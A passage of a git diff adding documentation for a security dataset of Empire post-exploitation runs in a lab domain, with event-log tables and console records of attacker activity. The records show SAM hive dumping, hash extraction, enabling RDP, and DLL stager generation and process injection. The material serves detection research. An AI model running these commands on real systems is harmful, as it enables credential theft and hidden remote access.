TKV35P8X to run module powershell/credentials/powerdump +(Empire: powershell/credentials/powerdump) > Job started: 36KA8E +Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: + + +Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: + + +DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: + + +WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: + + +Nora:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: + + + + +(Empire: powershell/credentials/powerdump) > +``` \ No newline at end of file diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_powerdump.tar.gz b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_powerdump.tar.gz new file mode 100644 index 00000000..d076af6c Binary files /dev/null and b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_powerdump.tar.gz differ diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_reg_dump_sam.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_reg_dump_sam.md index 22c471e8..bc37b5c3 100644 --- a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_reg_dump_sam.md +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_reg_dump_sam.md @@ -1,4 +1,3 @@ - # Empire Reg Dump SAM An adversary with administrator privileges can use the windows reg utility to dump the SAM registry hive. @@ -53,7 +52,7 @@ Shire | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 153 | | Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 377 | -## Empire Activity +## Attacker Activity ``` shell reg save HKLM\sam sam diff --git a/small_datasets/windows/defense_evasion/file_permissions_modifications_T1222/ad_object_modification/README.md b/small_datasets/windows/defense_evasion/file_permissions_modifications_T1222/ad_object_modification/README.md index fb5ef17e..56d5f3d8 100644 --- a/small_datasets/windows/defense_evasion/file_permissions_modifications_T1222/ad_object_modification/README.md +++ b/small_datasets/windows/defense_evasion/file_permissions_modifications_T1222/ad_object_modification/README.md @@ -4,6 +4,6 @@ An adversary with valid permissions can modify permissions in active directory o ## Technique Variations Table -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_dcsync_acl](./empire_dcsync_acl.md) | 2019-03-01125905 | \ No newline at end of file +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_dcsync_acl](./empire_dcsync_acl.md) | 2019-03-01125905 | \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/file_permissions_modifications_T1222/ad_object_modification/empire_dcsync_acl.md b/small_datasets/windows/defense_evasion/file_permissions_modifications_T1222/ad_object_modification/empire_dcsync_acl.md index 1c444265..444a7f25 100644 --- a/small_datasets/windows/defense_evasion/file_permissions_modifications_T1222/ad_object_modification/empire_dcsync_acl.md +++ b/small_datasets/windows/defense_evasion/file_permissions_modifications_T1222/ad_object_modification/empire_dcsync_acl.md @@ -1,4 +1,3 @@ - # Empire DCSync ACL An adversary with enough permissions (domain admin) can add an ACL to the Root Domain for any user, despite being in no privileged groups, having no malicious sidHistory, and not having local admin rights on the domain controller itself . @@ -58,7 +57,7 @@ Shire | Microsoft-Windows-PowerShell/Operational | Executing Pipeline | 264 | -## Empire Activity +## Attacker Activity ``` scriptimport data/module_source/situational_awareness/network/powerview.ps1 diff --git a/small_datasets/windows/defense_evasion/modify_registry_T1112/README.md b/small_datasets/windows/defense_evasion/modify_registry_T1112/README.md new file mode 100644 index 00000000..ee346527 --- /dev/null +++ b/small_datasets/windows/defense_evasion/modify_registry_T1112/README.md @@ -0,0 +1,10 @@ +# Modify Registry + +Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ----------- | ------- | --------- | +| shire | [empire_enable_rdp](./empire_enable_rdp.md) | 2019-05-18203650 | +| shire | [empire_wdigest_downgrade](./empire_wdigest_downgrade.md) | 2019-05-18201922 | \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_enable_rdp.md b/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_enable_rdp.md new file mode 100644 index 00000000..4935875c --- /dev/null +++ b/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_enable_rdp.md @@ -0,0 +1,101 @@ +# Empire Enable RDP + +Enables RDP on the remote machine and adds a firewall exception. + +## Technique(s) ID + +T1112 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_enable_rdp.tar.gz](./empire_enable_rdp.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18203650 + +## About this file + +| log_name | source_name | task | record_number | +|------------------------------------------------------------------------|------------------------------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 169 | +| System | Microsoft-Windows-TerminalServices-RemoteConnectionManager | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 115 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 56 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 24 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 11 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 9 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 9 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 9 | +| Security | Microsoft-Windows-Security-Auditing | MPSSVC Rule-Level Policy Change | 9 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 7 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 6 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 4 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 4 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 3 | +| Security | Microsoft-Windows-Security-Auditing | Computer Account Management | 2 | +| Security | Microsoft-Windows-Security-Auditing | Other System Events | 2 | +| Security | Microsoft-Windows-Security-Auditing | System Integrity | 2 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 1 | +| Microsoft-Windows-Windows Firewall With Advanced Security/Firewall | Microsoft-Windows-Windows Firewall With Advanced Security | na | 9 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 1 | +| Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational | Microsoft-Windows-TerminalServices-RemoteConnectionManager | na | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 701 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 481 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 452 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 293 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 89 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 18 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 15 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 11 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 7 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 3 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 140 | + +## Attackers Activity + +``` +(Empire: TKV35P8X) > usemodule management/enable_rdp* +(Empire: powershell/management/enable_rdp) > info + + Name: Enable-RDP + Module: powershell/management/enable_rdp + NeedsAdmin: True + OpsecSafe: False + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @harmj0y + +Description: + Enables RDP on the remote machine and adds a firewall + exception. + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Agent True TKV35P8X Agent to run module on. + +(Empire: powershell/management/enable_rdp) > execute +[>] Module is not opsec safe, run? [y/N] y +[*] Tasked TKV35P8X to run TASK_CMD_WAIT +[*] Agent TKV35P8X tasked with task ID 21 +[*] Tasked agent TKV35P8X to run module powershell/management/enable_rdp +(Empire: powershell/management/enable_rdp) > The operation completed successfully. + + +(Empire: powershell/management/enable_rdp) > +``` \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_enable_rdp.tar.gz b/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_enable_rdp.tar.gz new file mode 100644 index 00000000..0f2f6d3b Binary files /dev/null and b/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_enable_rdp.tar.gz differ diff --git a/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_wdigest_downgrade.md b/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_wdigest_downgrade.md new file mode 100644 index 00000000..4cb05c5b --- /dev/null +++ b/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_wdigest_downgrade.md @@ -0,0 +1,56 @@ +# Empire Wdigest Downgrade + +Sets wdigest on the machine to explicitly use by setting HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential + +## Technique(s) ID + +T1112 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_wdigest_downgrade.tar.gz](./empire_wdigest_downgrade.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18201922 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 220 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 100 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 83 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 16 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 4 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 4 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 4 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 3 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 3 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 2 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Authentication Service | 1 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 1755 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 112 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 92 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 78 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 14 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 14 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 183 | + +## Attacker Activity \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_wdigest_downgrade.tar.gz b/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_wdigest_downgrade.tar.gz new file mode 100644 index 00000000..a6ff41e9 Binary files /dev/null and b/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_wdigest_downgrade.tar.gz differ diff --git a/small_datasets/windows/defense_evasion/process_injection_T1055/README.md b/small_datasets/windows/defense_evasion/process_injection_T1055/README.md new file mode 100644 index 00000000..16bf5521 --- /dev/null +++ b/small_datasets/windows/defense_evasion/process_injection_T1055/README.md @@ -0,0 +1,10 @@ +# Process Injection + +Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_psinject](./empire_psinject.md) | 2019-05-18200432 | +| shire | [empire_dll_injection](./empire_dll_injection.md) | 2019-05-18221344 | \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/process_injection_T1055/empire_dll_injection.md b/small_datasets/windows/defense_evasion/process_injection_T1055/empire_dll_injection.md new file mode 100644 index 00000000..7f495eab --- /dev/null +++ b/small_datasets/windows/defense_evasion/process_injection_T1055/empire_dll_injection.md @@ -0,0 +1,306 @@ +# Empire Dll Injection + +Invoke-DllInjection injects a Dll into an arbitrary process. It does this by using VirtualAllocEx to allocate memory the size of the DLL in the remote process, writing the names of the DLL to load into the remote process spacing using WriteProcessMemory, and then using RtlCreateUserThread to invoke LoadLibraryA in the context of the remote process. + +## Technique(s) ID + +T1055 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_dll_injection.tar.gz](./empire_dll_injection.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18221344 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 753 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 8 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 205 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 180 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 40 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 14 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 11 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 10 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 10 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 10 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 9 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 6 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 5 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 3 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 1 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 42 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 392 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 189 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 129 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 94 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 32 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 19 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 5 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | CreateRemoteThread detected (rule: CreateRemoteThread) | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 628 | + +## Attacker Activity + +``` +(Empire: listeners) > usestager windows/dll +(Empire: stager/windows/dll) > info + +Name: DLL Launcher + +Description: + Generate a PowerPick Reflective DLL to inject with + stager code. + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener True Listener to use. + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + Obfuscate False False Switch. Obfuscate the launcher + powershell code, uses the + ObfuscateCommand for obfuscation types. + For powershell only. + Proxy False default Proxy to use for request (default, none, + or other). + Language True powershell Language of the stager to generate. + OutFile True /tmp/launcher.dll File to output dll to. + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + Arch True x64 Architecture of the .dll to generate + (x64 or x86). + ObfuscateCommand False Token\All\1 The Invoke-Obfuscation command to use. + Only used if Obfuscate switch is True. + For powershell only. + StagerRetries False 0 Times for the stager to retry + connecting. + + +(Empire: stager/windows/dll) > set Listener https +(Empire: stager/windows/dll) > execute + +[*] Stager output written out to: /tmp/launcher.dll + +(Empire: stager/windows/dll) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 22:10:13 https + TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 22:10:13 https + V6W3TH8Y ps 172.18.39.106 HR001 SHIRE\pgustavo powershell 5204 5/0.0 2019-05-18 22:10:09 https + + +(Empire: agents) > interact TKV35P8X +(Empire: TKV35P8X) > usemodule code_execution/invoke_dllinjection +(Empire: powershell/code_execution/invoke_dllinjection) > set Dll launcher.dll +(Empire: powershell/code_execution/invoke_dllinjection) > back +(Empire: TKV35P8X) > ps +[*] Tasked TKV35P8X to run TASK_SHELL +[*] Agent TKV35P8X tasked with task ID 29 +(Empire: TKV35P8X) > ProcessName PID Arch UserName +----------- --- ---- -------- +Idle 0 x64 N/A +System 4 x64 N/A +Registry 68 x64 NT AUTHORITY\SYSTEM +WindowsInternal.ComposableShell.Experiences.TextInput.InputApp 184 x64 SHIRE\nmartha +svchost 264 x64 NT AUTHORITY\LOCAL + SERVICE +smss 276 x64 NT AUTHORITY\SYSTEM +svchost 324 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 352 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 368 x64 NT AUTHORITY\LOCAL + SERVICE +csrss 372 x64 NT AUTHORITY\SYSTEM +svchost 388 x64 NT AUTHORITY\SYSTEM +svchost 432 x64 NT AUTHORITY\SYSTEM +wininit 440 x64 NT AUTHORITY\SYSTEM +csrss 448 x64 NT AUTHORITY\SYSTEM +winlogon 508 x64 NT AUTHORITY\SYSTEM +services 532 x64 NT AUTHORITY\SYSTEM +lsass 540 x64 NT AUTHORITY\SYSTEM +svchost 672 x64 NT AUTHORITY\SYSTEM +fontdrvhost 680 x64 Font Driver Host\UMFD-1 +fontdrvhost 688 x64 Font Driver Host\UMFD-0 +svchost 748 x64 NT AUTHORITY\SYSTEM +svchost 780 x64 NT AUTHORITY\NETWORK + SERVICE +svchost 832 x64 NT AUTHORITY\SYSTEM +svchost 852 x64 NT AUTHORITY\LOCAL + SERVICE +dwm 936 x64 Window Manager\DWM-1 +svchost 1000 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 1048 x64 NT AUTHORITY\SYSTEM +svchost 1076 x64 NT AUTHORITY\NETWORK + SERVICE +svchost 1164 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 1180 x64 NT AUTHORITY\SYSTEM +svchost 1208 x64 NT AUTHORITY\NETWORK + SERVICE +RuntimeBroker 1220 x64 SHIRE\nmartha +svchost 1252 x64 NT AUTHORITY\SYSTEM +svchost 1280 x64 NT AUTHORITY\LOCAL + SERVICE +backgroundTaskHost 1392 x64 SHIRE\nmartha +svchost 1400 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 1424 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 1528 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 1572 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 1608 x64 NT AUTHORITY\SYSTEM +backgroundTaskHost 1676 x64 SHIRE\nmartha +Memory Compression 1744 x64 NT AUTHORITY\SYSTEM +svchost 1788 x64 NT AUTHORITY\SYSTEM +svchost 1800 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 1860 x64 NT AUTHORITY\NETWORK + SERVICE +svchost 1876 x64 NT AUTHORITY\SYSTEM +svchost 1884 x64 NT AUTHORITY\SYSTEM +SkypeApp 1896 x64 SHIRE\nmartha +svchost 1924 x64 NT AUTHORITY\SYSTEM +svchost 1952 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 2000 x64 NT AUTHORITY\SYSTEM +RuntimeBroker 2012 x64 SHIRE\nmartha +svchost 2024 x64 NT AUTHORITY\LOCAL + SERVICE +WmiPrvSE 2036 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 2132 x64 NT AUTHORITY\SYSTEM +spoolsv 2244 x64 NT AUTHORITY\SYSTEM +svchost 2260 x64 NT AUTHORITY\SYSTEM +svchost 2288 x64 NT AUTHORITY\NETWORK + SERVICE +svchost 2372 x64 NT AUTHORITY\NETWORK + SERVICE +svchost 2380 x64 NT AUTHORITY\SYSTEM +svchost 2388 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 2404 x64 NT AUTHORITY\SYSTEM +Sysmon 2440 x64 NT AUTHORITY\SYSTEM +svchost 2468 x64 NT AUTHORITY\SYSTEM +svchost 2492 x64 SHIRE\nmartha +svchost 2512 x64 NT AUTHORITY\SYSTEM +wlms 2528 x64 NT AUTHORITY\SYSTEM +svchost 2712 x64 NT AUTHORITY\LOCAL + SERVICE +unsecapp 2824 x64 NT AUTHORITY\SYSTEM +SkypeBackgroundHost 2992 x64 SHIRE\nmartha +conhost 3096 x64 SHIRE\nmartha +notepad 3124 x64 SHIRE\nmartha +svchost 3168 x64 NT AUTHORITY\SYSTEM +RuntimeBroker 3276 x64 SHIRE\nmartha +taskhostw 3288 x64 SHIRE\nmartha +ShellExperienceHost 3300 x64 SHIRE\nmartha +svchost 3304 x64 SHIRE\nmartha +svchost 3368 x64 NT AUTHORITY\SYSTEM +svchost 3472 x64 NT AUTHORITY\SYSTEM +svchost 3476 x64 NT AUTHORITY\NETWORK + SERVICE +Microsoft.Photos 3704 x64 SHIRE\nmartha +svchost 3736 x64 NT AUTHORITY\SYSTEM +svchost 3756 x64 NT AUTHORITY\LOCAL + SERVICE +conhost 3816 x64 SHIRE\nmartha +svchost 3852 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 3984 x64 NT AUTHORITY\SYSTEM +MicrosoftEdgeCP 4044 x64 SHIRE\nmartha +sihost 4068 x64 SHIRE\nmartha +svchost 4108 x64 NT AUTHORITY\SYSTEM +ApplicationFrameHost 4132 x64 SHIRE\nmartha +ctfmon 4144 x64 SHIRE\nmartha +svchost 4240 x64 NT AUTHORITY\LOCAL + SERVICE +OneDrive 4352 x86 SHIRE\nmartha +svchost 4524 x64 NT AUTHORITY\SYSTEM +explorer 4592 x64 SHIRE\nmartha +RuntimeBroker 4616 x64 SHIRE\nmartha +Windows.WARP.JITService 4828 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 4864 x64 SHIRE\nmartha +SearchUI 4928 x64 SHIRE\nmartha +dllhost 5064 x64 SHIRE\nmartha +RuntimeBroker 5152 x64 SHIRE\nmartha +powershell 5172 x64 SHIRE\nmartha +powershell 5204 x64 SHIRE\pgustavo +svchost 5300 x64 NT AUTHORITY\LOCAL + SERVICE +WmiPrvSE 5312 x64 NT AUTHORITY\SYSTEM +powershell 5452 x64 SHIRE\nmartha +dllhost 5796 x64 SHIRE\nmartha +svchost 5820 x64 NT AUTHORITY\SYSTEM +YourPhone 6048 x64 SHIRE\nmartha +svchost 6160 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 6304 x64 NT AUTHORITY\SYSTEM +RuntimeBroker 6312 x64 SHIRE\nmartha +svchost 6336 x64 SHIRE\nmartha +svchost 6392 x64 NT AUTHORITY\SYSTEM +SearchIndexer 6464 x64 NT AUTHORITY\SYSTEM +smartscreen 6500 x64 SHIRE\nmartha +SecurityHealthSystray 6560 x64 SHIRE\nmartha +SecurityHealthService 6640 x64 NT AUTHORITY\SYSTEM +SgrmBroker 6672 x64 NT AUTHORITY\SYSTEM +svchost 6772 x64 NT AUTHORITY\LOCAL + SERVICE +RuntimeBroker 6776 x64 SHIRE\nmartha +taskhostw 6792 x64 SHIRE\nmartha +svchost 6856 x64 NT AUTHORITY\SYSTEM +svchost 7248 x64 NT AUTHORITY\NETWORK + SERVICE +svchost 7292 x64 NT AUTHORITY\SYSTEM +svchost 7844 x64 NT AUTHORITY\SYSTEM +WmiPrvSE 7944 x64 NT AUTHORITY\NETWORK + SERVICE +conhost 7976 x64 SHIRE\pgustavo +MicrosoftEdgeSH 8376 x64 SHIRE\nmartha +svchost 8516 x64 NT AUTHORITY\SYSTEM +RuntimeBroker 8804 x64 SHIRE\nmartha +MicrosoftEdge 9012 x64 SHIRE\nmartha +browser_broker 9108 x64 SHIRE\nmartha +Windows.WARP.JITService 9160 x64 NT AUTHORITY\LOCAL + SERVICE + +(Empire: TKV35P8X) > upload /tmp/launcher.dll +[*] Tasked agent to upload launcher.dll, 155 KB +[*] Tasked TKV35P8X to run TASK_UPLOAD +[*] Agent TKV35P8X tasked with task ID 30 +(Empire: TKV35P8X) > usemodule code_execution/invoke_dllinjection +(Empire: powershell/code_execution/invoke_dllinjection) > set ProcessID 3124 +(Empire: powershell/code_execution/invoke_dllinjection) > execute +[*] Tasked TKV35P8X to run TASK_CMD_WAIT +[*] Agent TKV35P8X tasked with task ID 31 +[*] Tasked agent TKV35P8X to run module powershell/code_execution/invoke_dllinjection +(Empire: powershell/code_execution/invoke_dllinjection) > System.Diagnostics.ProcessModule (launcher.dll) +``` \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/process_injection_T1055/empire_dll_injection.tar.gz b/small_datasets/windows/defense_evasion/process_injection_T1055/empire_dll_injection.tar.gz new file mode 100644 index 00000000..1f5afb6e Binary files /dev/null and b/small_datasets/windows/defense_evasion/process_injection_T1055/empire_dll_injection.tar.gz differ diff --git a/small_datasets/windows/defense_evasion/process_injection_T1055/empire_psinject.md b/small_datasets/windows/defense_evasion/process_injection_T1055/empire_psinject.md new file mode 100644 index 00000000..26346119 --- /dev/null +++ b/small_datasets/windows/defense_evasion/process_injection_T1055/empire_psinject.md @@ -0,0 +1,130 @@ +# Empire Psinject + +Adversaries can reflectively load a DLL to enable additional functionalities to any process in the endpoint. An adversary can use Empire psinject to inject Unmanaged PowerShell into any process. This project is a reflective DLL based on Stephen Fewer's method. It imports/runs a .NET assembly into its memory space that supports the running of Powershell code using System.Management.Automation. + +## Technique(s) ID + +T1055 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_psinject.tar.gz](./empire_psinject.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18200432 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 1739 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 16 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 2 | +| System | Microsoft-Windows-GroupPolicy | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 474 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 167 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 127 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 50 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 16 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 16 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 15 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 13 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 11 | +| Security | Microsoft-Windows-Security-Auditing | 